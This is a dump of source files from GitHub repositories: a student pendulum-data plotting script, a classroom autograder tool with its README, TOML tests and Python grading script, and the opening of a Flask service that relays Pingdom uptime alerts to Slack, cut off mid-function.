"path": "/Step 4/Step4.py",
"repo_name": "ES2Spring2020-ComputinginEngineering/project-1-faith-and-jessica",
"src_encoding": "UTF-8",
"text": "# Project 1\n# Step 4\n# Analysis of Results\n#\n# Jessica Nordlund \n# Faith Seely\n# \n##################################\n\n# IMPORT STATEMENTS\n##################################\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport csv\nimport scipy.signal\n\n\n\n# CUSTOM FUNCTION DEFINITIONS\n###################################\n\n# function: getAccX\n# purpose: gets the x acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of x accelerations (floats)\ndef getAccX(filename): \n acc_x = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_x = np.append(acc_x, row[0]) \n \n acc_x = acc_x.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_x)\n\n# function: getAccY\n# purpose: gets the y acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of y accelerations (floats)\ndef getAccY(filename): \n acc_y = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_y = np.append(acc_y, row[1]) \n \n acc_y = acc_y.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_y)\n\n# function: getAccZ\n# purpose: gets the z acceleration from the given file and returns it as an\n# array\n# paramter: filename (where data is located)\n# return: array of z accelerations (floats)\ndef getAccZ(filename): \n acc_z = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n acc_z = np.append(acc_z, row[2]) \n \n acc_z = acc_z.astype(np.float) #from array of strings to floats\n return scipy.signal.medfilt(acc_z)\n \n\n# function: getTime\n# purpose: gets the time stamps from the given file and returns them as an\n# array\n# paramter: filename (where data is located)\n# return: array of times (floats)\ndef getTime(filename): \n times = np.empty(0, dtype=float)\n raw_data = open(filename)\n data_csv = csv.reader(raw_data)\n \n for row in data_csv:\n if (len(row) != 0):\n times = np.append(times, row[3]) \n \n times = times.astype(np.float) #from array of strings to floats\n return times\n \n\n# function: graphAcc\n# purpose: takes 3 arrays of accelerations and an array of time of a pendulum \n# and graphs the variables (accelerations vs time)\n# paramter: numpy arrays of accelerations (milli-g) of pendulum and numpy of \n# time (seconds)\n# return: void\ndef graphAcc(acc_x, acc_y, acc_z,time): \n plt.subplot(311)\n plt.plot(time, acc_x, \"b\")\n plt.xlabel(\"Time (s)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.legend('X')\n \n plt.subplot(312)\n plt.plot(time, acc_y, \"r\")\n plt.ylabel(\"Acceleration (milli-g)\")\n plt.xlabel(\"Time (s)\")\n plt.legend('Y')\n \n plt.subplot(313)\n plt.plot(time, acc_z, \"g\")\n plt.xlabel(\"Time (s)\")\n plt.legend('Z')\n\n plt.show()\n \n \n# function: calcTheta\n# purpose: finds the theta values from a given set of accelerations\n# paramter: numpy array of accelerations, length of pendulum\n# return: numpy array of angular positions\ndef calcTheta(accelerations, length):\n accs = accelerations.astype(np.float)\n thetas = np.arctan(np.divide(accs,length))\n \n return scipy.signal.medfilt(thetas)\n \n \n# function: graphTheta\n# purpose: takes an array of angular positions and an array of times \n# and graphs the variables (angular position vs time)\n# paramter: numpy array of thetas (radians) of accelerations and numpy of \n# time (seconds)\n# return: void\ndef graphTheta(theta, time):\n plt.plot(time, theta, \"b\")\n plt.ylabel(\"Angular Position (degrees)\")\n plt.xlabel(\"Time (s)\")\n plt.title(\"Pendulum Acceleration vs Time\")\n plt.show()\n \n\n\n# function: displayData\n# purpose: displays accelerations vs time graphs and angle vs time graphs \n# from the data given, also prints calculated period\n# paramter: filename of where data for pendulum is stored (.csv) and string\n# of length of pendulum (inches)\n# return: void\ndef displayData(file, length):\n print('GETTING DATA FOR PENDULUM WITH LENGTH OF ', length, ' INCHES')\n acc_x = getAccX(file)\n acc_y = getAccY(file)\n acc_z = getAccZ(file)\n time = getTime(file)\n graphAcc(acc_x,acc_y,acc_z,time)\n thetas = calcTheta(acc_x, float(length))\n graphTheta(thetas,time)\n print('\\n\\n\\n')\n \n \n# function: display\n# purpose: displays accelerations vs time graphs and angle vs time graphs \n# from the data for 5 different length pendulums, also prints \n# calculated period\n# paramter: filenames of where data for each pendulum is stored (.csv)\n# file1 = 21 inches\n# file2 = 17 inches\n# file3 = 13 inches\n# file4 = 9 inches\n# file5 = 4.75 inches \n# return: void\ndef display(file1, file2, file3, file4, file5):\n displayData(file1, '21')\n displayData(file2, '17')\n displayData(file3, '13')\n displayData(file4, '9')\n displayData(file5, '4.75')\n\n\n# MAIN SCRIPT\n###################################\n\ndisplay('Data21.csv', 'Data17.csv', 'Data13.csv', 'Data9.csv', \n 'Data475.csv')\n"
}
] | 7 |
maguiremarion/autograder
|
https://github.com/maguiremarion/autograder
|
8c763e5e29cd22f84ef8e4a5257ef7240a314b07
|
671347c4e4b8421504267ba3f1a66f1b8ea8bdd8
|
eaa6d12c0ebbf4a7671b30745996254fab29aba0
|
refs/heads/main
| 2023-07-13T06:41:24.768113 | 2021-08-21T17:29:56 | 2021-08-21T17:29:56 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3856041133403778,
"alphanum_fraction": 0.5012853741645813,
"avg_line_length": 15.913043022155762,
"blob_id": "ea085adbd860c14e333a9b5bb12ec143232af2a7",
"content_id": "c41d83e33af246f26437b49354a02ac0f4e968c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 389,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 23,
"path": "/example_tests/project02/project02.toml",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "[[tests]]\nname = \"01\"\ninput = [\"./$project\", \"-e\", \"1 + 1\"]\nexpected = \"2\"\nrubric = 5\n\n[[tests]]\nname = \"02\"\ninput = [\"./$project\", \"-e\", \"10\", \"-b\", \"16\"]\nexpected = \"0x0000000A\"\nrubric = 5\n\n[[tests]]\nname = \"03\"\ninput = [\"./$project\", \"-e\", \"10 + 1\"]\nexpected = \"11\"\nrubric = 5\n\n[[tests]]\nname = \"04\"\ninput = [\"./$project\", \"-e\", \"10 + 1\", \"-b\", \"16\"]\nexpected = \"0x0000000B\"\nrubric = 5\n"
},
{
"alpha_fraction": 0.665744960308075,
"alphanum_fraction": 0.6877033114433289,
"avg_line_length": 42.2957763671875,
"blob_id": "125073e8157ebf9fb023329e2f09a03b00edc183",
"content_id": "c75d144734920ddc9dd7bf05b9350232ef15371e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6148,
"license_type": "permissive",
"max_line_length": 204,
"num_lines": 142,
"path": "/README.md",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "# autograder\n`grade` is a tool for Computer Science students and instructors to test student projects for correctness. Its features include:\n1. Clone all student repos based on a list of Github IDs\n1. Build all student repos using `make`\n1. Run all student repos against instructor-provided input files\n1. Score actual output vs. expected using an instructor-provided rubric.\n1. Integration with the [Digital](https://github.com/hneemann/Digital) circuit simulation tool\n\n## Requirements\n1. Requires python3 and pip3. Python 3.7.3 is pre-installed on Raspberry Pi OS.\n ```\n $ sudo apt install python3-pip\n ```\n1. Requires [TOML](https://toml.io/en/) python module\n ```\n $ pip3 install toml\n ```\n\n## Installation\n1. Clone the `autograder` repo\n ```\n $ cd ~\n $ git clone [email protected]:/phpeterson-usf/autograder.git\n ```\n1. Add the directory to your path in `~/.bashrc`\n ```\n export PATH=~/autograder/:$PATH\n ```\n1. Clone your class's tests repo. Use the right one for your class - these are just examples.\n ```\n $ cd ~\n $ git clone [email protected]:/cs315-21s/tests.git\n $ git clone [email protected]:/USF-CS631-S21/tests.git\n ``` \n1. Run the `grade` script once and it will create a config file in `~/.config/grade`. Edit this so it contains the following pieces of information:\n 1. The authentication you use for GitHub: ssh or https\n 1. The Github Classroom organization for your class\n 1. The path to your tests repo\n ```\n credentials = \"ssh\"\n testspath = \"/home/pi/tests\"\n ```\n\n## Usage for Students\n1. You can test a project in the current directory like this\n ```\n $ cd ~/project02-phpeterson-usf\n $ grade test --project project02\n ```\n\n## Usage for Instructors\n1. Add your Github Classroom organization and a list of students to your `~/.config/grade/config.toml`\n ```\n org = \"cs315-21s\"\n students = [\n \"phpeterson-usf\",\n \"gdbenson\",\n ]\n ```\n1. You can clone all of your students repos to your machine. `grade` will create `./github.com/` in the current working directory, with subdirectories for your organization and student repos\n ```\n $ grade clone\n github.com/cs315-21s/project02-phpeterson-usf\n github.com/cs315-21s/project02-gdbenson\n ```\n1. After developing test cases for your projects (see below), you can test all of your students' repos in batch\n ```\n $ grade class\n project02-phpeterson-usf 01 02 10/10\n project02-gdbenson 01 02 10/10\n ```\n1. Each test case can pass or fail. The score is shown as the total earned/total available, based on the `rubric` field in each test case\n\n## Test Cases\n1. Instructors must create their own repo for the test cases for the class projects. Students will clone and pull this repo. We create this repo in the Github Classroom Organization, but that's up to you.\n1. Test cases for each project are expressed in TOML, as you can see in the `example_tests/` directory here\n1. Test case inputs are a list of strings for each command-line flag and value. The keyword `$project` will be substituted for\nthe name of your project. \n ```\n $ cat project02.toml\n [[tests]]\n name = \"01\"\n input = [\"./$project\", \"-e\", \"1 + 1\"]\n expected = \"2\"\n rubric = 5\n \n [[tests]]\n name = \"02\"\n input = [\"./$project\", \"-e\", \"10\", \"-b\", \"16\"]\n expected = \"0x0000000A\"\n rubric = 5\n ```\n1. Note that this usage of `$project` is flexible enough for projects which are run using an interpreter like Java or Python\n ```\n [[tests]]\n input = [\"python3\", \"$project.py\"]\n ```\n1. Test cases can have input files in your `tests` repo using the keyword `$project_tests`, which will be \nsubstituted for `$testspath/$project/`. In this example, substitution gives the input file as `$testspath/project02/testinput.txt`\n ```\n [[tests]]\n name = \"03\"\n input = [\"./$project\", \"$project_tests/testinput.txt\"]\n ```\n1. Test case output can be recorded from `stdout` or from a file. If `output` is not given, Autograder defaults to `stdout`\n ```\n [[tests]]\n name = \"04\"\n output = \"04.txt\"\n input = [\"./$project\", \"-o\", \"04.txt\"]\n ```\n\n## Command Line Parameters\n1. `grade` supports these parameters, which can be given on the command line, or in `~/.config/grade/config.toml`, for less typing. \n1. The syntax in `config.toml` just uses the name, without dashes, as shown at the top of this README\n1. The command-line format is argparse-style, with no \"=\". These two commands are equivalent:\n ```\n $ cd ~/project02-jsmith\n $ grade test -p project02\n $ grade test --project project02\n ```\n1. Parameters given on the command line override those given in `config.toml`\n* `-c/--credentials` [https | ssh] https is the default\n* `-d/--digital` is the path to Digital's JAR file\n* `-e/--exec` provide commands to execute (e.g. `git pull; make clean`)\n* `-i/--ioprint` prints inputs and outputs to help write project specs\n* `-n/--name` runs one named test case, rather than all of them\n* `-o/--org` is the Github Classroom Organization \n* `-p/--project` is the name of the project, which is substituted into repo names and test case inputs\n* `-s/--students` is a list of student Github IDs (no punctuation needed)\n* `-v/--verbose` shows expected and actual for failing test cases\n* `-vv/--vverbose` shows expected and actual for all test cases\n\n## Using Digital\n1. [Digital](https://github.com/hneemann/Digital) has test case components which can test a circuit using pre-defined inputs and outputs. See Digital's documentation for scripted testing examples.\n1. `grade` leverages its ability to loop over the student repos, using Java and Digital's test case components, looking\nfor a passing report from Digital\n1. Examples of Digital test cases combined with autograder test cases are available [here](https://github.com/phpeterson-usf/autograder/tree/main/tests/project06)\n1. `grade` needs to know where Digital's JAR file lives. There is a configuration for that path in `config.toml`, in your platform's native format\n ```\n digital = \"/home/me/Digital/digital.jar\"\n ```\n"
},
{
"alpha_fraction": 0.5354330539703369,
"alphanum_fraction": 0.5388181805610657,
"avg_line_length": 34.66666793823242,
"blob_id": "140073c581d20f1689ef80036f501a15fce58a4a",
"content_id": "ed7bbb85704a27f88e005e4b51369c82ffb45be9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13589,
"license_type": "permissive",
"max_line_length": 131,
"num_lines": 381,
"path": "/grade",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport argparse\nimport difflib\nimport os\nimport pathlib\nimport string\nimport subprocess\nimport sys\nimport toml\n\n\ndef fatal(s):\n print(s)\n sys.exit(-1)\n\n\ndef cmd_exec(args, wd=None, shell=False):\n return subprocess.run(args, capture_output=True, timeout=10, cwd=wd, shell=shell)\n\n\ndef cmd_exec_rc(args, wd=None):\n proc = cmd_exec(args, wd)\n return proc.returncode\n\n\ndef cmd_exec_capture(args, wd=None, path=None, shell=False):\n proc = cmd_exec(args, wd, shell)\n if (path):\n try:\n # capture output written to path\n f = open(path, 'r')\n output = f.read()\n f.close()\n except FileNotFoundError:\n return ''\n else:\n # capture output written to stdout\n output = proc.stdout.decode('utf-8')\n return output.rstrip('\\n')\n\n\ndef print_green(s, e=''):\n print('\\033[92m' + s + '+' + ' \\033[0m', end=e)\n\n\ndef print_red(s, e=''):\n print('\\033[91m' + s + '-' + ' \\033[0m', end=e)\n\n\ndef load_toml(fname):\n with open(fname) as f:\n try:\n return toml.load(f)\n except Exception as e:\n fatal(f'{fname}: {e}')\n\n\nclass ProjectConfig:\n def __init__(self, d):\n self.build = d.get('build', 'make')\n self.strip_output = d.get('strip_output')\n\nclass Config:\n def __init__(self, d):\n self.action = d['action'] # required\n self.credentials = d['credentials'] # required\n self.digital = d.get('digital') # optional til Digital projects\n self.exec_cmd = d.get('exec') # optional\n self.local = d.get('local') # could get students or local\n self.org = d['org'] # required\n self.project = d['project'] # required\n self.project_cfg = None # comes from project toml\n self.ioprint = d['ioprint'] # optional\n self.testspath = os.path.expanduser(d.get('testspath')) # required\n self.project_tests = os.path.join(self.testspath, self.project) \n self.students = d.get('students') # could get students or local\n self.test_name = d['name'] # optional\n self.verbose = d['verbose'] # optional, defaults to False\n self.verbose2 = d['verbose2'] # optional\n if self.verbose2:\n self.verbose = True\n\n def validate_args(d):\n if d['project'] is None:\n fatal('project not given in config or command line')\n if d['action'] == 'exec' and d.get('exec') is None:\n fatal('-e \\'cmd\\' not given with exec')\n\n\n def parse_args(fname):\n # Check to see if ~/.config/grade/config.toml exits\n # Create if it does not exit\n # Create path if needed\n home = str(pathlib.Path.home())\n config_path = home + '/.config/grade'\n config_file_path = pathlib.Path(config_path + '/config.toml')\n if not config_file_path.exists():\n pathlib.Path(config_path).mkdir(parents=True, exist_ok=True)\n with open(config_file_path, 'w') as f:\n f.write('# Default config.toml\\n')\n f.write('# credentials = \"ssh\"\\n')\n f.write('# credentials = \"http\"\\n') \n f.write('# digital = \"path_to_Digital.jar\"\\n')\n f.write('# org = \"github_org_name\"\\n')\n f.write('# project = \"default_project_name\"\\n')\n f.write('# students = [\\n')\n f.write('# \"github_id_1\",\\n')\n f.write('# \"github_id_2\",\\n')\n f.write('# \"github_id_3\"\\n')\n f.write('# ]\\n')\n f.write('# testspath = \"path_to_tests\"\\n')\n f.write('# verbose = false\\n')\n f.write('# verbose = true\\n')\n\n # .toml file contains defaults. Command line args can override\n defaults = load_toml(config_file_path)\n p = argparse.ArgumentParser()\n p.add_argument('action', type=str, choices=['class', 'clone', 'exec', 'test'])\n p.add_argument('-c', '--credentials', choices=['https', 'ssh'], help='Github auth method',\n default=defaults.get('credentials', 'ssh'))\n p.add_argument('-d', '--digital', help='Path to digital.jar',\n default=defaults.get('digital', None))\n p.add_argument('-e', '--exec', help='Execute command in each repo (git pull or make clean)',\n default=defaults.get('exec', None))\n p.add_argument('-l', '--local', help='Local directory to test',\n default=defaults.get('local', '.'))\n p.add_argument('-n', '--name', help='Run test case with this name',\n default=defaults.get('test_name', None))\n p.add_argument('-o', '--org', help='Github Classroom Organization',\n default=defaults.get('org', None))\n p.add_argument('-p', '--project', help='Project name',\n default=defaults.get('project', None))\n p.add_argument('-i', '--ioprint', action='store_true', help='Print input and output',\n default=defaults.get('print', False))\n p.add_argument('-s', '--students', nargs='+', type=str, help='Student Github IDs',\n default=defaults.get('students', None))\n p.add_argument('-t', '--testspath', help='Path to tests',\n default=defaults.get('testspath', '~/tests'))\n p.add_argument('-v', '--verbose', action='store_true', help='Print actual and expected output when they don\\'t match',\n default=defaults.get('verbose', False))\n p.add_argument('-vv', '--verbose2', action='store_true', help='Print actual and expected output whether they match or not',\n default=defaults.get('verbose2', False))\n \n d = vars(p.parse_args())\n Config.validate_args(d)\n return d\n\n\nclass TestCase:\n trans_table = str.maketrans(dict.fromkeys(string.whitespace))\n def __init__(self, cfg, d):\n self.validate(d)\n self.cmd_line = []\n for i in d['input']:\n if '$project_tests' in i:\n param = i.replace('$project_tests', cfg.project_tests)\n elif '$project' in i:\n param = i.replace('$project', cfg.project)\n elif '$digital' in i:\n param = i.replace('$digital', cfg.digital)\n else:\n param = i\n self.cmd_line.append(param)\n self.expected = d.get('expected', None)\n self.name = d.get('name', None)\n self.output = d.get('output', 'stdout')\n self.rubric = d.get('rubric', None)\n self.strip_output = cfg.project_cfg.strip_output\n self.verbose = cfg.verbose\n self.verbose2 = cfg.verbose2\n self.ioprint = cfg.ioprint\n\n\n def validate(self, d):\n test_name = d.get('name', 'unknown')\n if type(d.get('rubric')) is not int:\n fatal('Rubric for test \\\"{test_name}\\\" must be an integer')\n if type(d.get('input')) is not list:\n fatal(f'Input for test \\\"{test_name}\\\" must be a list')\n if type(d.get('expected')) is not str:\n fatal(f'Expected output for test \\\"{test_name}\\\" must be a string')\n\n\n def get_actual(self, local):\n if self.output == 'stdout':\n # get actual output from stdout\n act = cmd_exec_capture(self.cmd_line, local)\n else:\n # ignore stdout and get actual output from the specified file\n path = os.path.join(local, self.output)\n act = cmd_exec_capture(self.cmd_line, local, path)\n if self.strip_output:\n act = act.replace(self.strip_output, '')\n return act\n\n def prepare_cmd_line(self, cmd_line):\n cmd_line_prepared = [cmd_line[0]]\n for arg in cmd_line[1:]:\n if ' ' in arg:\n arg = '\"' + arg + '\"'\n cmd_line_prepared.append(arg)\n return cmd_line_prepared\n\n def make_lines(self, text):\n text_lines = []\n for line in text.split('\\n'):\n text_lines.append(line + '\\n')\n return text_lines\n \n def match_expected(self, actual):\n # Strip trailing whitespace - expected has extra newline\n exp = self.expected.rstrip()\n act = actual.rstrip()\n\n cmd_line = self.prepare_cmd_line(self.cmd_line)\n cmd_line_str = ' '.join(cmd_line)\n\n if self.verbose2:\n print(f\"===[{self.name}]===expected\\n$ {cmd_line_str}\\n{exp}\")\n print()\n print(f\"===[{self.name}]===actual\\n$ {cmd_line_str}\\n{act}\")\n print()\n if self.verbose and (act != exp):\n print(f\"===[{self.name}]===diff\\n$ {cmd_line_str}\")\n exp_lines = self.make_lines(exp)\n act_lines = self.make_lines(act)\n diff = difflib.context_diff(exp_lines, act_lines, fromfile='expected', tofile='actual')\n for line in diff:\n print(line, end='')\n print()\n \n if self.ioprint:\n print(f\"$ {cmd_line_str}\\n{actual}\")\n return act == exp\n\ndef load_tests(cfg):\n tests_file = os.path.join(cfg.project_tests, cfg.project + '.toml', )\n toml_input = load_toml(tests_file)\n cfg.project_cfg = ProjectConfig(toml_input.get('project', {}))\n test_cases = []\n for t in toml_input['tests']:\n test_cases.append(TestCase(cfg, t))\n\n return test_cases\n\n\nclass Repo:\n def __init__(self, cfg, **kwargs):\n # calculate the local and remote for this repo\n student = kwargs.get('student')\n if student:\n pg = cfg.project + '-' + student\n self.local = os.path.join('github.com', cfg.org, pg)\n # set up remote repo for clone\n if cfg.credentials == 'https':\n self.remote = 'https://github.com/'\n elif cfg.credentials == 'ssh':\n self.remote = '[email protected]:/'\n self.remote += cfg.org + '/' + pg + '.git'\n # allow -l/--local to override the local directory calculated above\n if kwargs.get('local'):\n self.local = kwargs['local'].rstrip('/')\n self.label = self.local.split('/')[-1]\n self.results = []\n self.verbose = cfg.verbose\n self.build_plan = cfg.project_cfg.build\n\n def build(self):\n if self.build_plan == 'none':\n return 0\n elif self.build_plan == 'make':\n return cmd_exec_rc(['make', '-C', self.local])\n else:\n fatal(f'Unknown build plan: \\\"{self.build_plan}\\\"')\n\n\n def clone(self):\n if self.remote is None:\n raise Exception(self.label + ' no remote to clone')\n if os.path.isdir(self.local):\n print('Already exists: ' + self.local)\n return 0\n print(self.local)\n return cmd_exec_rc(['git', 'clone', self.remote, self.local])\n\n\n def exec_cmd(self, cmd):\n print(self.local, end = ': ')\n output = cmd_exec_capture(cmd, wd=self.local, shell=True)\n print(output)\n\n\n def test_one(self, test_case):\n score = 0\n actual = test_case.get_actual(self.local)\n if test_case.match_expected(actual):\n score = test_case.rubric\n\n # record score for later printing\n result = {'test': test_case, 'score': score}\n self.results.append(result)\n\n\n def test(self, test_cases, test_name):\n if test_name is not None:\n for tc in test_cases:\n if tc.name == test_name:\n self.test_one(tc)\n else:\n for tc in test_cases:\n self.test_one(tc)\n\n\n def print_results(self, longest):\n print(self.label, end='')\n for n in range(longest - len(self.label)):\n print(' ', end='')\n\n earned = 0\n avail = 0\n for r in self.results:\n rubric = r['test'].rubric\n avail += rubric\n if r['score'] == 0:\n print_red(r['test'].name)\n else:\n earned += rubric\n print_green(r['test'].name)\n\n print(f\"{earned}/{avail}\")\n\n\ndef main():\n args = Config.parse_args('config.toml')\n cfg = Config(args)\n test_cases = load_tests(cfg)\n\n # Build list of repos to run, either from local or list of students\n repos = []\n if cfg.action == 'test':\n # One local repo\n if not os.path.isdir(cfg.local):\n raise Exception(cfg.local + ' is not a directory')\n repo = Repo(cfg, local=cfg.local)\n repos.append(repo)\n elif cfg.students:\n # Make repo list from student list\n for s in cfg.students:\n repo = Repo(cfg, student=s)\n repos.append(repo)\n else:\n print(\"Must either 'test' one repo, or give a list of students to 'clone', 'pull' or 'class'\")\n return -1\n\n # Calc column width for justified printing\n longest = 0;\n for r in repos:\n l = len(r.label)\n if l > longest:\n longest = l\n longest += 1\n\n # Run the specified actions for all of the repos\n for repo in repos:\n try:\n if cfg.action == 'clone':\n repo.clone()\n elif cfg.action == 'exec':\n repo.exec_cmd(cfg.exec_cmd)\n elif cfg.action == 'class' or cfg.action == 'test':\n repo.build()\n repo.test(test_cases, cfg.test_name)\n repo.print_results(longest)\n except Exception as e:\n print_red(repo.label + ' ' + str(e), '\\n')\n continue\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6700000166893005,
"alphanum_fraction": 0.699999988079071,
"avg_line_length": 26.272727966308594,
"blob_id": "a7bdc80f00ecc573df2478064afb1a24ccb372cf",
"content_id": "181f7eb32e88210f05d572caf89cee36fefa95ef",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 300,
"license_type": "permissive",
"max_line_length": 64,
"num_lines": 11,
"path": "/config.toml",
"repo_name": "maguiremarion/autograder",
"src_encoding": "UTF-8",
"text": "# This is an example config file showing how to set it up\n# Your real config file should go in ~/.config/grade/config.toml\n\ncredentials = \"ssh\"\ndigital = \"/mnt/c/Users/usf/Documents/Digital/digital.jar\"\norg = \"cs-315-03-20f\"\nproject = \"project02\"\nstudents = [\n \"phpeterson-usf\",\n \"gdbenson\",\n]\n"
}
] | 4 |
rnt/pingdom2slack
|
https://github.com/rnt/pingdom2slack
|
75f9fa5ed6fb6fe9441ab8c3a7429b18f2fc26e5
|
92ed0b3a6c2b6cb039ee6eee8a0b243f5ecdf82e
|
4b7c97047aded886b2d8d529046b61634a473bc3
|
refs/heads/master
| 2020-08-28T18:08:09.777879 | 2019-11-08T01:45:35 | 2019-11-08T01:45:35 | 217,778,298 | 1 | 0 | null | 2019-10-26T22:46:47 | 2017-07-12T15:23:47 | 2017-07-12T15:23:46 | null |
[
{
"alpha_fraction": 0.6222222447395325,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 30.5,
"blob_id": "9cefba7fe2cfcf86a808bb313339fae2da28f199",
"content_id": "249f6e9b7a82473252f654419c7f66c0eed1e52e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 10,
"path": "/CHANGELOG.md",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "# Changelog\n\nThe format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),\nand this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).\n\n## [0.1.0] - 2019-10-30\n### Added\n- Add support to *http check*.\n\n[0.1.0]: https://github.com/rnt/pingdom2slack/releases/tag/v0.1.0\n"
},
{
"alpha_fraction": 0.48124006390571594,
"alphanum_fraction": 0.48586371541023254,
"avg_line_length": 29.052391052246094,
"blob_id": "0c0c0ecb02bc2c7fb10bcaf2188f542c3b64f8f4",
"content_id": "a81ebc9d7adb14f63447b7e0dc9e2d598ded4228",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13193,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 439,
"path": "/pingdom2slack.py",
"repo_name": "rnt/pingdom2slack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport datetime\nimport json\nimport os\nimport time\n\nfrom flask import abort, Flask, jsonify, request\nimport requests\n\n__version__ = \"0.1.3\"\n\napp = Flask(__name__)\n\ntry:\n SLACK_WEBHOOK = os.environ[\"SLACK_WEBHOOK\"]\n app.logger.debug(\"Slack webhook URL found in env variable\")\nexcept:\n SLACK_WEBHOOK = None\n app.logger.error(\"No Slack webhook URL found\")\n abort(502)\n\ntry:\n PINGDOM_TOKEN = os.environ[\"PINGDOM_TOKEN\"]\n app.logger.debug(\"Pingdom Token found in env variable\")\nexcept:\n PINGDOM_TOKEN = None\n app.logger.error(\"No Pingdom Token found\")\n abort(502)\n\n\nEMOJI_NUMBER = [\n \":one:\",\n \":two:\",\n \":three:\",\n \":four:\",\n \":five:\",\n \":six:\",\n \":seven:\",\n \":eight:\",\n \":nine:\",\n \":keycap_ten:\",\n]\n\n\ndef pingdom_analysis(check_id, state_changed_timestamp):\n \"\"\"Return pingdom analysis for a check.\n\n :param int check_id: Pingdom check id to search\n :param int state_changed_timestamp: RCA timestamp\n\n :return dict\n \"\"\"\n headers = {\"Authorization\": \"Bearer %s\" % PINGDOM_TOKEN}\n\n url = \"https://api.pingdom.com/api/3.1/analysis/%d\" % check_id\n\n # Make the call\n response = requests.get(url, headers=headers)\n app.logger.debug(response.__dict__)\n if response.status_code != 200:\n app.logger.debug(response.content)\n return None\n\n analysis = response.json()[\"analysis\"]\n analysis_ids = [\n test[\"id\"]\n for test in analysis\n if test[\"timefirsttest\"] == state_changed_timestamp\n ]\n if len(analysis_ids) == 0:\n app.logger.debug(\"No analysis id\")\n return None\n else:\n app.logger.debug(\"pingdom analysis id = %d\" % analysis_ids[0])\n\n url = \"https://api.pingdom.com/api/3.1/analysis/%d/%d\" % (check_id, analysis_ids[0])\n\n response = requests.get(url, headers=headers)\n\n if response.status_code != 200:\n app.logger.debug(response.content)\n return None\n else:\n return response.json()\n\n\ndef post_2_slack(channel, pingdom_data):\n \"\"\"Post message to slack.\n\n :param str channel: Slack channel\n :param dict pingdom_data: Data received from webhook\n \"\"\"\n\n start_time = time.time()\n\n status = pingdom_data[\"current_state\"]\n\n icon_emoji = {\"DOWN\": \":warning:\", \"UP\": \":ok:\"}.get(status, \":ghost:\")\n\n title_emoji = {\n \"DOWN\": os.environ.get(\"TITLE_EMOJI_DOWN\", \":warning:\"),\n \"UP\": os.environ.get(\"TITLE_EMOJI_UP\", \":ok:\"),\n }.get(status, \":ghost:\")\n\n analysis = None\n if status == \"DOWN\":\n analysis = pingdom_analysis(\n pingdom_data[\"check_id\"], pingdom_data[\"state_changed_timestamp\"]\n )\n\n analysis_time = time.time()\n\n check_name = pingdom_data[\"check_name\"]\n\n if \"full_url\" in pingdom_data[\"check_params\"].keys():\n check_url = pingdom_data[\"check_params\"][\"full_url\"]\n else:\n check_url = pingdom_data[\"check_params\"][\"hostname\"]\n\n error = pingdom_data[\"long_description\"]\n\n # Choose attachment colot\n color = {\"DOWN\": \"danger\", \"UP\": \"good\"}.get(status, \"#0000FF\")\n\n verify_certificate = {True: \":+1:\", False: \":-1:\"}.get(\n pingdom_data[\"check_params\"][\"verify_certificate\"], \":thinking_face:\"\n )\n basic_auth = {True: \":+1:\", False: \":-1:\"}.get(\n pingdom_data[\"check_params\"][\"basic_auth\"], \":thinking_face:\"\n )\n\n fields = []\n\n blocks = [\n {\n \"text\": {\n \"text\": \"%s *%s* is *%s* %s\"\n % (title_emoji, check_name, status, title_emoji),\n \"type\": \"mrkdwn\",\n },\n \"type\": \"section\",\n },\n {\n \"text\": {\"text\": \"*Check URL*:\\n%s\" % (check_url), \"type\": \"mrkdwn\"},\n \"type\": \"section\",\n },\n ]\n\n BLOCK_ID_WEBHOOK_DATA = len(blocks)\n blocks.append(\n {\n \"fields\": [\n {\n \"text\": \"*Check Type:*\\n%s\" % pingdom_data[\"check_type\"],\n \"type\": \"mrkdwn\",\n },\n {\n \"text\": \"*Importance Level:*\\n%s\"\n % pingdom_data[\"importance_level\"],\n \"type\": \"mrkdwn\",\n },\n {\"text\": \"*Basic auth?:*\\n%s\" % basic_auth, \"type\": \"mrkdwn\"},\n {\n \"text\": \"*Verify Certificate:*\\n%s\" % verify_certificate,\n \"type\": \"mrkdwn\",\n },\n {\n \"text\": \"*Response Time Threshold:*\\n%s ms\"\n % pingdom_data[\"check_params\"][\"responsetime_threshold\"],\n \"type\": \"mrkdwn\",\n },\n ],\n \"type\": \"section\",\n }\n )\n\n if len(pingdom_data[\"tags\"]) > 